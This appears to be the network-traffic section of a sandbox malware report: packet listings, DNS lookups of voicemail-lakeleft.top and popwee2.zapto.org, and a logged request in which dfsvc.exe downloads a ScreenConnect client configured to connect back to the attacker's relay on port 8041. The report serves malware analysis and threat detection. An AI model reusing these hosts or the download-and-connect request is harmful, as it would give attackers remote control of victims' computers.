                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.061659098 CET44349798194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.061685085 CET49798443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.061708927 CET49798443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.062057018 CET49798443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.062098026 CET44349798194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.062153101 CET49798443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.115827084 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.115864992 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.115955114 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.116278887 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:40.116293907 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690530062 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690543890 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690563917 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690619946 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690625906 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690766096 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690840960 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690856934 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690939903 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690964937 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690972090 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690988064 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.690999985 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691036940 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691442966 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691458941 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691509962 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691519976 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691601992 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691622019 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691678047 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691683054 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691692114 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691704988 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691740036 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691745996 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691786051 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691827059 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691845894 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691886902 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691896915 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.691920042 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.744694948 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802531004 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802572966 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802654982 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802666903 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802681923 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802731037 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802756071 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802759886 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802798033 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.802993059 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803047895 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803121090 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803136110 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803180933 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803185940 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803196907 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803246975 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803251982 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803266048 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803304911 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803329945 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803334951 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803349018 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803366899 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803406000 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803410053 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803457975 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803502083 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803508043 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803519964 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803561926 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803585052 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803638935 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803658962 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803704977 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803713083 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803843975 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803862095 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803895950 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803903103 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803930044 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.803955078 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804214954 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804230928 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804260969 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804287910 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804294109 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804302931 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804322004 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804354906 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.804358959 CET44349814194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:41.835860014 CET49814443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540801048 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540837049 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540843010 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540882111 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540956974 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.540972948 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541013002 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541021109 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541287899 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541309118 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541343927 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541352034 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541363955 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541393995 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541594982 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541620970 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541649103 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541655064 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541666985 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541695118 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541963100 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.541979074 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542031050 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542037964 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542279005 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542298079 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542329073 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542335987 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542361021 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542385101 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542474031 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542488098 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542536020 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542541981 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542565107 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.542587996 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628103018 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628122091 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628184080 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628197908 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628257036 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628478050 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628494024 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628551960 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628560066 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628580093 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.628603935 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656308889 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656379938 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656621933 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656676054 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656743050 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656752110 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656784058 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656821012 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656830072 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656851053 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656939030 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656941891 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.656992912 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657001972 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657162905 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657181978 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657215118 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657227039 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657236099 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657293081 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657314062 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657344103 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657351017 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657361031 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657371998 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657404900 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.657413006 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.658229113 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.658276081 CET44349825194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:43.658334970 CET49825443192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.233032942 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.237824917 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:46.238476038 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.670515060 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.675381899 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.916107893 CET804149851194.59.30.201192.168.2.7
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.948199034 CET498518041192.168.2.7194.59.30.201
                                                                                                                                                                                                                                                                  Nov 8, 2024 11:09:47.953064919 CET804149851194.59.30.201192.168.2.7
Nov 8, 2024 11:09:48.187362909 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:09:48.291598082 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:10:18.213934898 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:10:18.218858004 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:10:18.452091932 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:10:18.495121956 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:10:48.464467049 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:10:48.469583035 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:10:48.704150915 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:10:48.745438099 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:11:18.730514050 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:11:18.735749960 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:11:18.969363928 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:11:19.011524916 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:11:48.980528116 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:11:48.985820055 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:11:49.219935894 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:11:49.277376890 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:12:19.238533020 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201
Nov 8, 2024 11:12:19.507050037 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:12:19.740705967 CET | 8041 | 49851 | 194.59.30.201 | 192.168.2.7
Nov 8, 2024 11:12:19.793293953 CET | 49851 | 8041 | 192.168.2.7 | 194.59.30.201

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 8, 2024 11:09:18.592256069 CET | 62765 | 53 | 192.168.2.7 | 1.1.1.1
Nov 8, 2024 11:09:18.953244925 CET | 53 | 62765 | 1.1.1.1 | 192.168.2.7
Nov 8, 2024 11:09:19.942661047 CET | 61941 | 53 | 192.168.2.7 | 1.1.1.1
Nov 8, 2024 11:09:46.195241928 CET | 55362 | 53 | 192.168.2.7 | 1.1.1.1
Nov 8, 2024 11:09:46.203769922 CET | 53 | 55362 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 8, 2024 11:09:18.592256069 CET | 192.168.2.7 | 1.1.1.1 | 0x2f43 | Standard query (0) | voicemail-lakeleft.top | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:19.942661047 CET | 192.168.2.7 | 1.1.1.1 | 0x5699 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:46.195241928 CET | 192.168.2.7 | 1.1.1.1 | 0x5223 | Standard query (0) | popwee2.zapto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 8, 2024 11:09:18.953244925 CET | 1.1.1.1 | 192.168.2.7 | 0x2f43 | No error (0) | voicemail-lakeleft.top |  | 194.59.30.201 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:19.952583075 CET | 1.1.1.1 | 192.168.2.7 | 0x5699 | No error (0) | time.windows.com | twc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 8, 2024 11:09:22.872977018 CET | 1.1.1.1 | 192.168.2.7 | 0x83ce | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:22.872977018 CET | 1.1.1.1 | 192.168.2.7 | 0x83ce | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:23.546679974 CET | 1.1.1.1 | 192.168.2.7 | 0xc1b5 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 8, 2024 11:09:23.546679974 CET | 1.1.1.1 | 192.168.2.7 | 0xc1b5 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:24.995965958 CET | 1.1.1.1 | 192.168.2.7 | 0x45b7 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 8, 2024 11:09:24.995965958 CET | 1.1.1.1 | 192.168.2.7 | 0x45b7 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:09:46.203769922 CET | 1.1.1.1 | 192.168.2.7 | 0x5223 | No error (0) | popwee2.zapto.org |  | 194.59.30.201 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:10:13.118474007 CET | 1.1.1.1 | 192.168.2.7 | 0x7f5b | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 11:10:13.118474007 CET | 1.1.1.1 | 192.168.2.7 | 0x7f5b | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false

• voicemail-lakeleft.top

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49706 | 194.59.30.201 | 443 | 2628 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:09:19 UTC | 635 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-08 10:09:20 UTC | 251 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 117980
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:09:20 GMT
Connection: close
2024-11-08 10:09:20 UTC | 16133 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49708        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:22 UTC  104                OUT        GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:22 UTC  216                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 17866
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:22 GMT
                                                       Connection: close
2024-11-08 10:09:22 UTC  16168              IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49730        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
